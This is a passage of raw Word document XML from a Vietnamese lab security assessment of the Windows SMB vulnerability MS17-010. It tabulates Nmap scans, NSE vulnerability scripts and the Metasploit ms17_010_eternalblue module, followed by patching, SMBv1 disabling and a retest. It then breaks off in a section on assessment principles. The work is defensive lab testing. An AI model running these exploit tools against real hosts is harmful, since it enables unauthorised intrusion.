          <w:p w14:paraId="318BF80F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cổng dịch vụ có đang lắng nghe kết nối từ mạng hay không</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61B8188F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Quét cổng TCP trên máy mục tiêu để kiểm tra trạng thái </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E93203B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Nmap (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>-sS -p 139,445</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="553AD127" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7CE69F34" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phiên bản Dialect SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="36769237" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Máy mục tiêu có chấp nhận đàm phán qua SMBv1 không</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7DD4196D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Gửi gói đàm phán dialect để ghi nhận phiên bản giao thức</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4CE05572" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Nmap (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>--script smb-protocols</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="67B7A00E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C769DBC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dấu hiệu MS17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D8E0398" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Driver </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>srv.sys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> có phản hồi mã lỗi đặc trưng của bản chưa vá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C2CD74D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Gửi gói tin thăm dò an toàn vào </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>IPC$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> để kiểm tra trạng thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F4C9331" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Nmap (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>--script smb-vuln-ms17-010</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>), MSF Auxiliary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="26B2434F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0A84309A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trạng thái bản vá Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0C492C8F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Xác nhận máy chủ đã cài đặt gói cập nhật an ninh hay chưa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6E3F2EA8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kiểm tra lịch sử cập nhật và danh sách bản vá (Hotfix/KB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="08EDD287" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Lệnh </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>systeminfo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> / PowerShell trên Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="7AC796A9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FCD055E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Khả năng khai thác thực tế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1753AE8F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lỗ hổng CVE-2017-0144 có thể bị lợi dụng để thực thi mã không</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="005C5B66" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thực nghiệm kiểm tra trong mạng lab cô lập có sao lưu snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="722B1B6A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Metasploit Framework (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>ms17_010_eternalblue</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="122AA053" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="55EBC1DC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Nguyên tắc phòng thủ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5079077D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Áp dụng bản vá, tắt SMBv1 hoặc cấu hình chặn cổng bằng firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4E2115D5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thực hiện cấu hình phòng thủ trên Windows Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="664F7AE5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Update, PowerShell, Windows Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w:rsidRPr="009A434D" w14:paraId="1A18AE59" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="085550AB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Xác minh lại (Retest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C0472A8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Biện pháp phòng thủ có loại bỏ dấu hiệu lỗ hổng hay không</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61AF7C42" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chạy lại bộ kiểm thử để so sánh kết quả trước và sau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="243ED907" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">, NSE script, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FE546C7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00DB6619">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D90DD8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Cơ</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sở</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đánh</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giá</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trạng</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thái</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và</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nguyên</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tắc</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phòng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76F4F13B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4.1. Nguyên </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tắc</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phân</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định</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các</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cấp</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độ</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trạng</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thái</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dịch</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vụ</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và</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lỗ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>hổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DD75580" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Một</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thiếu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sót</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phổ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>biến</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đánh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>giá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ninh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>việc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>suy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>diễn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
